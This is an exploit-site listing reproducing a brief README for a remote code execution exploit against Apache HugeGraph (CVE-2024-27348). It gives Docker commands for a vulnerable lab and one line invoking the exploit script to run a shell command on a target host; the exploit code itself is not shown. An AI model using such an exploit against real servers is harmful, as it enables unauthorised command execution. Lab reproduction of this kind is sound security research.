Exploit for Improper Access Control in Apache Hugegraph CVE-2024-27348

Name: Exploit for Improper Access Control in Apache Hugegraph CVE-2024-27348
Rating: 5 (169 reviews)

2025-02-10 | CVSS 9.8

## https://sploitus.com/exploit?id=C514AD24-1A6A-5E08-A74E-A22C7B543D39
# CVE-2024-27348
This is a repository for Apache HugeGraph Remote Code Execution vulnerability(CVE-2024-27348))
# Docker
```
docker pull hugegraph/hugegraph:1.0.0
docker run -it --name hgserver -p 8081:8080 hugegraph/hugegraph:1.0.0

```
# docker-compose.yml
```
services:
  web:
    image: vulhub/hugegraph:1.2.0
    ports:
      - "8080:8080"
      - "5005:5005"
```
```
### docker compose up -d   
### visit：http://your_ip:8080 
```
# exploit
```
python .\CVE-2024-27348.py -t http://192.168.41.163:8080 -c "id"
```
![picture](./picture.png)
# about
For all you can see it
```
https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-apache-hugegraph-server-cve-2024-27348
```